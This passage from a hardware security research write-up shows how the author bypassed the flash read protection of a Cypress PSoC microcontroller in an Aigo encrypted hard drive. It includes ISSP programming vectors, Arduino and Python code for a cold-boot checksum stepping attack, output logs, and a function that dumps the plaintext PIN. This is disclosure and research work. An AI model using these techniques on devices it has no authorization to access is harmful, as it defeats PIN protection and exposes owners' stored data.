  • 07h : CheckSum
  • 08h : Calibrate0
  • 09h : Calibrate1

By comparing the vector names with the SROM functions, we can match the various operations supported by the protocol with the expected SROM parameters.

This gives us a decoding of the first 3 bits :

  • 100 => “wrmem”
  • 101 => “rdmem”
  • 110 => “wrreg”
  • 111 => “rdreg”

But to fully understand what is going on, it is better to be able to interact with the µC.

Talking to the PSoC

As Dirk Petrautzki already ported Cypress’ HSSP code on Arduino, I used an Arduino Uno to connect to the ISSP header of the keyboard PCB.

Note that over the course of my research, I modified Dirk’s code quite a lot, you can find my fork on GitHub: here, and the corresponding Python script to interact with the Arduino in my cypress_psoc_tools repository.

So, using the Arduino, I first used only the “official” vectors to interact, and in order to try to read the internal ROM using the VERIFY command. Which failed, as expected, most probably because of the flash protection bits.

I then built my own simple vectors to read/write memory/registers.

Note that we can read the whole SRAM, even though the flash is protected !

Identifying internal registers

After looking at the vector’s “disassembly”, I realized that some undocumented registers (0xF8-0xFA) were used to specify M8C opcodes to execute directly !

This allowed me to run various opcodes such as ADD, MOV A,X, PUSH or JMP, which, by looking at the side effects on all the registers, allowed me to identify which undocumented registers actually are the “usual” ones (A, X, SP and PC).

In the end, the vector’s “dissassembly” generated by HSSP_disas.rb looks like this, with comments added for clarity:

--== init2 ==--
[DE E0 1C] wrreg CPU_F (f7), 0x00      # reset flags
[DE C0 1C] wrreg SP (f6), 0x00         # reset SP
[9F 07 5C] wrmem KEY1, 0x3A            # Mandatory arg for SSC
[9F 20 7C] wrmem KEY2, 0x03            # same
[DE A0 1C] wrreg PCh (f5), 0x00        # reset PC (MSB) ...
[DE 80 7C] wrreg PCl (f4), 0x03        # (LSB) ... to 3 ??
[9F 70 1C] wrmem POINTER, 0x80         # RAM pointer for output data
[DF 26 1C] wrreg opc1 (f9), 0x30       # Opcode 1 => "HALT"
[DF 48 1C] wrreg opc2 (fa), 0x40       # Opcode 2 => "NOP"
[9F 40 3C] wrmem BLOCKID, 0x01         # BLOCK ID for SSC call
[DE 00 DC] wrreg A (f0), 0x06          # "Syscall" number : TableRead
[DF 00 1C] wrreg opc0 (f8), 0x00       # Opcode for SSC, "Supervisory SROM Call"
[DF E2 5C] wrreg CPU_SCR0 (ff), 0x12   # Undocumented op: execute external opcodes

Security bits

At this point, I am able to interact with the PSoC, but I need reliable information about the protection bits of the flash. I was really surprised that Cypress did not give any mean to the users to check the protection’s status. So, I dug a bit more on Google to finally realize that the HSSP code provided by Cypress was updated after Dirk’s fork.

And lo ! The following new vector appears:

[DE E0 1C] wrreg CPU_F (f7), 0x00
[DE C0 1C] wrreg SP (f6), 0x00
[9F 07 5C] wrmem KEY1, 0x3A
[9F 20 7C] wrmem KEY2, 0x03
[9F A0 1C] wrmem 0xFD, 0x00           # Unknown args
[9F E0 1C] wrmem 0xFF, 0x00           # same
[DE A0 1C] wrreg PCh (f5), 0x00
[DE 80 7C] wrreg PCl (f4), 0x03
[9F 70 1C] wrmem POINTER, 0x80
[DF 26 1C] wrreg opc1 (f9), 0x30
[DF 48 1C] wrreg opc2 (fa), 0x40
[DE 02 1C] wrreg A (f0), 0x10         # Undocumented syscall !
[DF 00 1C] wrreg opc0 (f8), 0x00
[DF E2 5C] wrreg CPU_SCR0 (ff), 0x12

By using this vector (see read_security_data in psoc.py), we get all the protection bits in SRAM at 0x80, with 2 bits per block.

The result is depressing: everything is protected in “Disable external read and write” mode ; so we cannot even write to the flash to insert a ROM dumper. The only way to reset the protection is to erase the whole chip :(

First (failed) attack: ROMX

However, we can try a trick: since we can execute arbitrary opcodes, why not execute ROMX, which is used to read the flash ?

The reasoning here is that the SROM ReadBlock function used by the programming vectors will verify if it is called from ISSP. However, the ROMX opcode probably has no such check.

So, in Python (after adding a few helpers in the Arduino C code):

for i in range(0, 8192):
    write_reg(0xF0, i>>8)        # A = 0
    write_reg(0xF3, i&0xFF)      # X = 0
    exec_opcodes("\x28\x30\x40") # ROMX, HALT, NOP
    byte = read_reg(0xF0)        # ROMX reads ROM[A|X] into A
    print "%02x" % ord(byte[0])  # print ROM byte

Unfortunately, it does not work :( Or rather, it works, but we get our own opcodes (0x28 0x30 0x40) back ! I do not think it was intended as a protection, but rather as an engineering trick: when executing external opcodes, the ROM bus is rewired to a temporary buffer.

Second attack: cold boot stepping

Since ROMX did not work, I thought about using a variation of the trick described in section 3.1 of Johannes Obermaier and Stefan Tatschner’s paper: Shedding too much Light on a Microcontroller’s Firmware Protection.

Implementation

The ISSP manual give us the following CHECKSUM-SETUP vector:

[DE E0 1C] wrreg CPU_F (f7), 0x00
[DE C0 1C] wrreg SP (f6), 0x00
[9F 07 5C] wrmem KEY1, 0x3A
[9F 20 7C] wrmem KEY2, 0x03
[DE A0 1C] wrreg PCh (f5), 0x00
[DE 80 7C] wrreg PCl (f4), 0x03
[9F 70 1C] wrmem POINTER, 0x80
[DF 26 1C] wrreg opc1 (f9), 0x30
[DF 48 1C] wrreg opc2 (fa), 0x40
[9F 40 1C] wrmem BLOCKID, 0x00
[DE 00 FC] wrreg A (f0), 0x07
[DF 00 1C] wrreg opc0 (f8), 0x00
[DF E2 5C] wrreg CPU_SCR0 (ff), 0x12

Which is just a call to SROM function 0x07, documented as follows (emphasis mine):

The Checksum function calculates a 16-bit checksum over a user specifiable number of blocks, within a single Flash bank starting at block zero. The BLOCKID parameter is used to pass in the number of blocks to checksum. A BLOCKID value of ‘1’ will calculate the checksum of only block 0, while a BLOCKID value of ‘0’ will calculate the checksum of 256 blocks in the bank. The 16-bit checksum is returned in KEY1 and KEY2. The parameter KEY1 holds the lower 8 bits of the checksum and the parameter KEY2 holds the upper 8 bits of the checksum. For devices with multiple Flash banks, the checksum func- tion must be called once for each Flash bank. The SROM Checksum function will operate on the Flash bank indicated by the Bank bit in the FLS_PR1 register.

Note that it is an actual checksum: bytes are summed one by one, no fancy CRC here. Also, considering the extremely limited register set of the M8C core, I suspected that the checksum would be directly stored in RAM, most probably in its final location: KEY1 (0xF8) / KEY2 (0xF9).

So the final attack is, in theory:

  1. Connect using ISSP
  2. Start a checksum computation using the CHECKSUM-SETUP vector
  3. Reset the CPU after some time T
  4. Read the RAM to get the current checksum C
  5. Repeat 3. and 4., increasing T a little each time
  6. Recover the flash content by substracting consecutive checkums C

However, we have a problem: the Initialize-1 vector, which we have to send after reset, overwrites KEY1 and KEY:

1100101000000000000000                 # Magic to put the PSoC in prog mode
nop
nop
nop
nop
nop
[DE E0 1C] wrreg CPU_F (f7), 0x00
[DE C0 1C] wrreg SP (f6), 0x00
[9F 07 5C] wrmem KEY1, 0x3A            # Checksum overwritten here
[9F 20 7C] wrmem KEY2, 0x03            # and here
[DE A0 1C] wrreg PCh (f5), 0x00
[DE 80 7C] wrreg PCl (f4), 0x03
[9F 70 1C] wrmem POINTER, 0x80
[DF 26 1C] wrreg opc1 (f9), 0x30
[DF 48 1C] wrreg opc2 (fa), 0x40
[DE 01 3C] wrreg A (f0), 0x09          # SROM function 9
[DF 00 1C] wrreg opc0 (f8), 0x00       # SSC
[DF E2 5C] wrreg CPU_SCR0 (ff), 0x12

But this code, overwriting our precious checksum, is just calling Calibrate1 (SROM function 9)… Maybe we can just send the magic to enter prog mode and then read the SRAM ?

And yes, it works !

The Arduino code implementing the attack is quite simple:

    case Cmnd_STK_START_CSUM:
      checksum_delay = ((uint32_t)getch())<<24;
      checksum_delay |= ((uint32_t)getch())<<16;
      checksum_delay |= ((uint32_t)getch())<<8;
      checksum_delay |= getch();
      if(checksum_delay > 10000) {
         ms_delay = checksum_delay/1000;
         checksum_delay = checksum_delay%1000;
      }
      else {
         ms_delay = 0;
      }
      send_checksum_v();
      if(checksum_delay)
          delayMicroseconds(checksum_delay);
      delay(ms_delay);
      start_pmode();
  1. It reads the checkum_delay
  2. Starts computing the checkum (send_checksum_v)
  3. Waits for the appropriate amount of time, with some caveats:
    • I lost some time here until I realized delayMicroseconds is precise only up to 16383µs)
    • and then again because delayMicroseconds(0) is totally wrong !
  4. Resets the PSoC to prog mode (without sending the initialization vectors, just the magic)

The final Python code is:

for delay in range(0, 150000):                          # delay in microseconds
    for i in range(0, 10):                              # number of reads for each delay
        try:
            reset_psoc(quiet=True)                      # reset and enter prog mode
            send_vectors()                              # send init vectors
            ser.write("\x85"+struct.pack(">I", delay))  # do checksum + reset after delay
            res = ser.read(1)                           # read arduino ACK
        except Exception as e:
            print e
            ser.close()
            os.system("timeout -s KILL 1s picocom -b 115200 /dev/ttyACM0 2>&1 > /dev/null")
            ser = serial.Serial('/dev/ttyACM0', 115200, timeout=0.5)  # open serial port
            continue
        print "%05d %02X %02X %02X" % (delay,           # read RAM bytes
                                       read_regb(0xf1),
                                       read_ramb(0xf8),
                                       read_ramb(0xf9))

What it does is simple:

  1. Reset the PSoC (and send the magic)
  2. Send the full initialization vectors
  3. Call the Cmnd_STK_START_CSUM (0x85) function on the Arduino, with a delay argument in microseconds.
  4. Reads the checksum (0xF8 and 0xF9) and the 0xF1 undocumented registers

This, 10 times per 1 microsecond step.

0xF1 is included as it was the only register that seemed to change while computing the checksum. It could be some temporary register used by the ALU ?

Note the ugly hack I use to reset the Arduino using picocom, when it stops responding (I have no idea why).

Reading the results

The output of the Python script looks like this (simplified for readability):

DELAY F1 F8 F9  # F1 is the unknown reg
                # F8 is the checksum LSB
                # F9 is the checksum MSB

00000 03 E1 19
[...]
00016 F9 00 03
00016 F9 00 00
00016 F9 00 03
00016 F9 00 03
00016 F9 00 03
00016 F9 00 00  # Checksum is reset to 0
00017 FB 00 00
[...]
00023 F8 00 00
00024 80 80 00  # First byte is 0x0080-0x0000 = 0x80 
00024 80 80 00
00024 80 80 00
[...]
00057 CC E7 00  # 2nd byte is 0xE7-0x80: 0x67
00057 CC E7 00
00057 01 17 01  # I have no idea what's going on here
00057 01 17 01
00057 01 17 01
00058 D0 17 01
00058 D0 17 01
00058 D0 17 01
00058 D0 17 01
00058 F8 E7 00  # E7 is back ?
00058 D0 17 01
[...]
00059 E7 E7 00
00060 17 17 00  # Hmmm
[...]
00062 00 17 00
00062 00 17 00
00063 01 17 01  # Oh ! Carry is propagated to MSB
00063 01 17 01
[...]
00075 CC 17 01  # So 0x117-0xE7: 0x30

We however have the the problem that since we have a real check sum, a null byte will not change the value, so we cannot only look for changes in the checksum. But, since the full (8192 bytes) computation runs in 0.1478s, which translates to about 18.04µs per byte, we can use this timing to sample the value of the checksum at the right points in time.

Of course at the beginning, everything is “easy” to read as the variation in execution time is negligible. But the end of the dump is less precise as the variability of each run increases:

134023 D0 02 DD
134023 CC D2 DC
134023 CC D2 DC
134023 CC D2 DC
134023 FB D2 DC
134023 3F D2 DC
134023 CC D2 DC
134024 02 02 DC
134024 CC D2 DC
134024 F9 02 DC
134024 03 02 DD
134024 21 02 DD
134024 02 D2 DC
134024 02 02 DC
134024 02 02 DC
134024 F8 D2 DC
134024 F8 D2 DC
134025 CC D2 DC
134025 EF D2 DC
134025 21 02 DD
134025 F8 D2 DC
134025 21 02 DD
134025 CC D2 DC
134025 04 D2 DC
134025 FB D2 DC
134025 CC D2 DC
134025 FB 02 DD
134026 03 02 DD
134026 21 02 DD

Hence the 10 dumps for each µs of delay. The total running time to dump the 8192 bytes of flash was about 48h.

Reconstructing the flash image

I have not yet written the code to fully recover the flash, taking into account all the timing problems. However, I did recover the beginning. To make sure it was correct, I disassembled it with m8cdis:

0000: 80 67     jmp   0068h         ; Reset vector
[...]
0068: 71 10     or    F,010h
006a: 62 e3 87  mov   reg[VLT_CR],087h
006d: 70 ef     and   F,0efh
006f: 41 fe fb  and   reg[CPU_SCR1],0fbh
0072: 50 80     mov   A,080h
0074: 4e        swap  A,SP
0075: 55 fa 01  mov   [0fah],001h
0078: 4f        mov   X,SP
0079: 5b        mov   A,X
007a: 01 03     add   A,003h
007c: 53 f9     mov   [0f9h],A
007e: 55 f8 3a  mov   [0f8h],03ah
0081: 50 06     mov   A,006h
0083: 00        ssc
[...]
0122: 18        pop   A
0123: 71 10     or    F,010h
0125: 43 e3 10  or    reg[VLT_CR],010h
0128: 70 00     and   F,000h ; Paging mode changed from 3 to 0
012a: ef 62     jacc  008dh
012c: e0 00     jacc  012dh
012e: 71 10     or    F,010h
0130: 62 e0 02  mov   reg[OSC_CR0],002h
0133: 70 ef     and   F,0efh
0135: 62 e2 00  mov   reg[INT_VC],000h
0138: 7c 19 30  lcall 1930h
013b: 8f ff     jmp   013bh
013d: 50 08     mov   A,008h
013f: 7f        ret

It looks good !

Locating the PIN address

Now that we can read the checksum at arbitrary points in time, we can check easily if and where it changes after:

  • entering a wrong PIN
  • changing the PIN

First, to locate the approximate location, I dumped the checksum in steps for 10ms after reset. Then I entered a wrong PIN and did the same.

The results were not very nice as there’s a lot of variation, but it appeared that the checksum changes between 120000µs and 140000µs of delay. Which was actually completely false and an artefact of delayMicroseconds doing non-sense when called with 0.

Then, after losing about 3 hours, I remembered that the SROM’s CheckSum syscall has an argument that allows to specify the number of blocks to checksum ! So we can easily locate the PIN and “bad PIN” counter down to a 64-byte block.

My initial runs gave:

No bad PIN          |   14 tries remaining  |   13 tries remaining
                    |                       |
block 125 : 0x47E2  |   block 125 : 0x47E2  |   block 125 : 0x47E2
block 126 : 0x6385  |   block 126 : 0x634F  |   block 126 : 0x6324
block 127 : 0x6385  |   block 127 : 0x634F  |   block 127 : 0x6324
block 128 : 0x82BC  |   block 128 : 0x8286  |   block 128 : 0x825B

Then I changed the PIN from “123456” to “1234567”, and I got:

No bad try            14 tries remaining
block 125 : 0x47E2    block 125 : 0x47E2
block 126 : 0x63BE    block 126 : 0x6355
block 127 : 0x63BE    block 127 : 0x6355
block 128 : 0x82F5    block 128 : 0x828C

So both the PIN and “bad PIN” counter seem to be stored in block 126.

Dumping block 126

Block 126 should be about 125x64x18 = 144000µs after the start of the checksum. So make sure, I looked for checksum 0x47E2 in my full dump, and it looked more or less correct.

Then, after dumping lots of imprecise (because of timing) data, manually fixing the results and comparing flash values (by staring at them), I finally got the following bytes at delay 145527µs:

PIN          Flash content
1234567      2526272021222319141402
123456       2526272021221919141402
998877       2d2d2c2c23231914141402
0987654      242d2c2322212019141402
123456789    252627202122232c2d1902

It is quite obvious that the PIN is stored directly in plaintext ! The values are not ASCII or raw values but probably reflect the readings from the capacitive keyboard.

Finally, I did some other tests to find where the “bad PIN” counter is, and found this :

Delay  CSUM
145996 56E5 (old: 56E2, val: 03)
146020 571B (old: 56E5, val: 36)
146045 5759 (old: 571B, val: 3E)
146061 57F2 (old: 5759, val: 99)
146083 58F1 (old: 57F2, val: FF) <<---- here
146100 58F2 (old: 58F1, val: 01)

0xFF means “15 tries” and it gets decremented with each bad PIN entered.

Recovering the PIN

Putting everything together, my ugly code for recovering the PIN is:

def dump_pin():
    pin_map = {0x24: "0", 0x25: "1", 0x26: "2", 0x27:"3", 0x20: "4", 0x21: "5",
               0x22: "6", 0x23: "7", 0x2c: "8", 0x2d: "9"}
    last_csum = 0
    pin_bytes = []
    for delay in range(145495, 145719, 16):
        csum = csum_at(delay, 1)
        byte = (csum-last_csum)&0xFF
        print "%05d %04x (%04x) => %02x" % (delay, csum, last_csum, byte)
        pin_bytes.append(byte)
        last_csum = csum
    print "PIN: ",
    for i in range(0, len(pin_bytes)):
        if pin_bytes[i] in pin_map:
            print pin_map[pin_bytes[i]],
    print

Which outputs:

$ ./psoc.py 
syncing:  KO  OK
Resetting PSoC:  KO  Resetting PSoC:  KO  Resetting PSoC:  OK
145495 53e2 (0000) => e2
145511 5407 (53e2) => 25
145527 542d (5407) => 26
145543 5454 (542d) => 27
145559 5474 (5454) => 20
145575 5495 (5474) => 21
145591 54b7 (5495) => 22
145607 54da (54b7) => 23
145623 5506 (54da) => 2c
145639 5506 (5506) => 00
145655 5533 (5506) => 2d
145671 554c (5533) => 19
145687 554e (554c) => 02
145703 554e (554e) => 00
PIN:  1 2 3 4 5 6 7 8 9

Great success !

Note that the delay values I used are probably valid only on the specific PSoC I have.

What’s next ?

So, to sum up on the PSoC side in the context of our Aigo HDD:

  • we can read the SRAM even when it’s protected (by design)
  • we can bypass the flash read protection by doing a cold-boot stepping attack and read the PIN directly

However, the attack is a bit painful to mount because of timing issues. We could improve it by:

  • writing a tool to correctly decode the cold-boot attack output
  • using a FPGA for more precise timings (or use Arduino hardware timers)
  • trying another attack: “enter wrong PIN, reset and dump RAM”, hopefully the good PIN will be stored in RAM for comparison. However, it is not easily doable on Arduino, as it outputs 5V while the board runs on 3.3V.

One very cool thing to try would be to use voltage glitching to bypass the read protection. If it can be made to work, it would give us absolutely accurate reads of the flash, instead of having to rely on checksum readings with poor timings.

As the SROM probably reads the flash protection bits in the ReadBlock “syscall”, we can maybe do the same as in described on Dmitry Nedospasov’s blog, a reimplementation of Chris Gerlinsky’s attack presented at REcon Brussels 2017.

One other fun thing would also be to decap the chip and image it to dump the SROM, uncovering undocumented syscalls and maybe vulnerabilities ?

Conclusion

To conclude, the drive’s security is broken, as it relies on a normal (not hardened) micro-controller to store the PIN… and I have not (yet) checked the data encryption part !

What should Aigo have done ? After reviewing a few encrypted HDD models, I did a presentation at SyScan in 2015 which highlights the challenges in designing a secure and usable encrypted external drive and gives a few options to do something better :)

Overall, I spent 2 week-ends and a few evenings, so probably around 40 hours from the very beginning (opening the drive) to the end (dumping the PIN), including writing those 2 blog posts. A very fun and interesting journey ;)